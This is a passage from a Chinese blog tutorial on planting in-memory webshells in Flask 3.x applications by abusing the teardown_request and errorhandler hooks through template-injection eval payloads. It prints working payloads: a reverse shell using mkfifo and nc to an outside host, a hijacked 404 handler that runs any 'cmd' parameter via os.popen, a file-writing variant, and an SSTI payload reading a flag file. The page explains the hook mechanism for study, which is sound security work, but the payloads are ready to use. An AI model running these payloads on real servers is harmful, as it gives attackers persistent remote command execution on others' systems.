<p>本质是：允许用户在某个特定时机插入自定义逻辑的一种机制，通俗点讲就是，钩子函数就像是在一个流程中预留出来的挂钩点，你可以挂上自己的函数来改变或增强原有的行为<br>这个是不是和前面的装饰器（增强函数行为）有点像，其实装饰器是就是通过钩子函数来增强函数的行为的</p>
</blockquote>
<p>特点：</p>
<ul>
<li>预定义的调用时机：不是你直接调用钩子函数，而是某个系统、框架或库在合适的时候自动调用它。</li>
<li>用户自定义逻辑：你写的函数会被当作 “钩子” 插入原流程中执行。</li>
<li>可插拔、灵活扩展：不需要改动原代码，就可以通过钩子增强功能</li>
</ul>
<h4 id="teardown-request"><a href="#teardown-request" class="headerlink" title="teardown_request"></a>teardown_request</h4><blockquote>
<p>teardown_request 是在每个请求的最后阶段执行的，即在视图函数处理完成并生成响应后，或者在请求中发生未处理的异常时，都会执行这个钩子。</p>
<p>它执行的时机是在响应已经确定之后，但在最终发送给客户端之前。</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">teardown_request</span>(<span class="params">self, f</span>):</span><br><span class="line">        <span class="variable language_">self</span>.teardown_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">        <span class="keyword">return</span> f</span><br></pre></td></tr></table></figure>

<p>由于是无回显所以反弹shell和写入文件都可以</p>
<p>反弹shell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].teardown_request_funcs.setdefault(None, []).append(lambda error: __import__(&#x27;os&#x27;).system(&#x27;mkfifo /tmp/fifo; /bin/sh -i &lt; /tmp/fifo | nc ip port &gt; /tmp/fifo; rm /tmp/fifo&#x27;))&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>写入文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].teardown_request_funcs.setdefault(None, []).append(lambda error: __import__(&#x27;os&#x27;).popen(&#x27;ls &gt; 11.txt&#x27;).read())&quot;</span>)</span><br></pre></td></tr></table></figure>



<h4 id="errorhandler"><a href="#errorhandler" class="headerlink" title="errorhandler"></a>errorhandler</h4><p>此函数可以用于自定义 404 页面的回显，用于处理应用程序中发生的错误，当你 flask 遇到错误，你可以定义自定义的错误处理程序来处理错误并返回适当的响应</p>
<p>跟进拿到源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">errorhandler</span>(<span class="params"></span></span><br><span class="line"><span class="params">    self, code_or_exception: <span class="built_in">type</span>[Exception] | <span class="built_in">int</span></span></span><br><span class="line"><span class="params"></span>) -&gt; t.<span class="type">Callable</span>[[T_error_handler], T_error_handler]:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">decorator</span>(<span class="params">f: T_error_handler</span>) -&gt; T_error_handler:</span><br><span class="line">        <span class="variable language_">self</span>.register_error_handler(code_or_exception, f)      <span class="comment">#这个是去注册f</span></span><br><span class="line">        <span class="keyword">return</span> f         <span class="comment">#返回的是错误处理函数</span></span><br><span class="line">    <span class="keyword">return</span> decorator</span><br><span class="line"><span class="comment"># T_error_handler   错误处理函数的类型</span></span><br></pre></td></tr></table></figure>

<p>继续跟进看看是怎么注册的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">register_error_handler</span>(<span class="params"></span></span><br><span class="line"><span class="params">        self,</span></span><br><span class="line"><span class="params">        code_or_exception: <span class="built_in">type</span>[Exception] | <span class="built_in">int</span>,</span></span><br><span class="line"><span class="params">        f: ft.ErrorHandlerCallable,</span></span><br><span class="line"><span class="params">    </span>) -&gt; <span class="literal">None</span>:</span><br><span class="line">        exc_class, code = <span class="variable language_">self</span>._get_exc_class_and_code(code_or_exception)</span><br><span class="line">        <span class="variable language_">self</span>.error_handler_spec[<span class="literal">None</span>][code][exc_class] = f</span><br></pre></td></tr></table></figure>

<p>这里注册就是error_handler_spec，它的结构：</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">self.error<span class="built_in">_</span>handler<span class="built_in">_</span>spec = &#123;</span><br><span class="line">    None: &#123;</span><br><span class="line">        404: &#123;</span><br><span class="line">            HTTPException: error<span class="built_in">_</span>handler<span class="built_in">_</span>function<span class="built_in">_</span>404,</span><br><span class="line">            AnotherException: error<span class="built_in">_</span>handler<span class="built_in">_</span>function<span class="built_in">_</span>another,</span><br><span class="line">        &#125;,</span><br><span class="line">        500: &#123;</span><br><span class="line">            HTTPException: error<span class="built_in">_</span>handler<span class="built_in">_</span>function<span class="built_in">_</span>500,</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>也就是说通过code和exc_class去注册这个f（错误处理函数），</p>
<p>但是这两家伙由_get_exc_class_and_code(code_or_exception)这个控制</p>
<blockquote>
<p>这个定义的函数 _get_exc_class_and_code 是用来处理异常类或 HTTP 状态码的。函数接受一个参数，exc_class_or_code，可以是一个异常类或者一个 HTTP 状态码（整型）。</p>
</blockquote>
<p>那么接下来直接控制f不就好了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__.__builtins__.<span class="built_in">exec</span>(<span class="string">&quot;global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;,&#x27;whoami&#x27;)).read()&quot;</span>,&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__.__builtins__.<span class="built_in">exec</span>(</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">	global exc_class</span></span><br><span class="line"><span class="string">	global code</span></span><br><span class="line"><span class="string">	exc_class, code = app._get_exc_class_and_code(404)</span></span><br><span class="line"><span class="string">	app.error_handler_spec[None][code][exc_class] =</span></span><br><span class="line"><span class="string">	lambda a:__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;,&#x27;whoami&#x27;)).read()</span></span><br><span class="line"><span class="string">	&#x27;&#x27;&#x27;</span>,</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="string">&#x27;request&#x27;</span>: url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],</span><br><span class="line">        <span class="string">&#x27;app&#x27;</span>: url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]</span><br><span class="line">    &#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>因为是在exec里面必须指定exec的由来，不像之前ssti里面打的</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;lipsum.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>.os.popen(request.values.x).read()&#125;&#125;<span class="built_in">&amp;</span>x=cat /f*</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>也算是学了一下原理，主要就是老马：加路由！新马：主要就是打入钩子函数，在特定的时机去触发！</p>
<p>当然不只是flask框架下可以打内存马，不同的框架有不同的打法，但原理估摸着都类似吧！</p>
<p>比如：<a target="_blank" rel="noopener" href="https://www.caterpie771.cn/archives/333#%E7%BB%8F%E5%85%B8%E8%B7%AF%E7%BA%BF%EF%BC%9A%E6%89%93%E8%B7%AF%E7%94%B1%E6%B7%BB%E5%8A%A0%E5%87%BD%E6%95%B0">FastAPI 内存马的研究 - caterpie的小站</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">h0me</a></li>
        
          <li><a href="/about/">ab0ut</a></li>
        
          <li><a href="/categories/">categ0ries</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a href="/links/">links</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE"><span class="toc-number">1.</span> <span class="toc-text">前置</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">1.1.</span> <span class="toc-text">什么是内存马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flask%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC%E5%8F%88%E6%80%8E%E4%B9%88%E8%AF%B4"><span class="toc-number">1.2.</span> <span class="toc-text">flask的内存马又怎么说</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A7%E9%A9%AC%EF%BC%88flask2-x%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">旧马（flask2.x）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#payload%E5%88%86%E6%9E%90"><span class="toc-number">2.1.</span> <span class="toc-text">payload分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#flask%E8%AF%B7%E6%B1%82%E4%B8%8A%E4%B8%8B%E6%96%87%E6%9C%BA%E5%88%B6"><span class="toc-number">2.1.1.</span> <span class="toc-text">flask请求上下文机制</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0test"><span class="toc-number">2.2.</span> <span class="toc-text">本地test</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B0%E9%A9%AC%EF%BC%88flask3-x%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">新马（flask3.x）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A3%85%E9%A5%B0%E5%99%A8"><span class="toc-number">3.1.</span> <span class="toc-text">装饰器</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8before-request"><span class="toc-number">3.1.1.</span> <span class="toc-text">利用before_request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8after-request"><span class="toc-number">3.1.2.</span> <span class="toc-text">利用after_request</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hook%E5%87%BD%E6%95%B0"><span class="toc-number">3.2.</span> <span class="toc-text">hook函数</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#teardown-request"><span class="toc-number">3.2.1.</span> <span class="toc-text">teardown_request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#errorhandler"><span class="toc-number">3.2.2.</span> <span class="toc-text">errorhandler</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">4.</span> <span class="toc-text">总结</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&text=flask下的内存马"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&is_video=false&description=flask下的内存马"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=flask下的内存马&body=Check out this article: https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&name=flask下的内存马&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&t=flask下的内存马"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025-2026
    Rufeii
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <li><a href="/">h0me</a></li><li><a href="/about/">ab0ut</a></li><li><a href="/categories/">categ0ries</a></li><li><a href="/tags/">tags</a></li><li><a href="/links/">links</a></li><li><a href="/search/">Search</a></li>
      </ul>
      <ul>
            
              <span id="busuanzi_container_site_pv">
                  本站总访问量<span id="busuanzi_value_site_pv"></span>次
              </span>
              <span class="post-meta-divider">|</span>
              <span id="busuanzi_container_site_uv" style='display:none'>
                      本站访客数<span id="busuanzi_value_site_uv"></span>人
              </span>
              
            
      </ul>
    </nav>
  </div>
</footer>
    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</body>
</html>
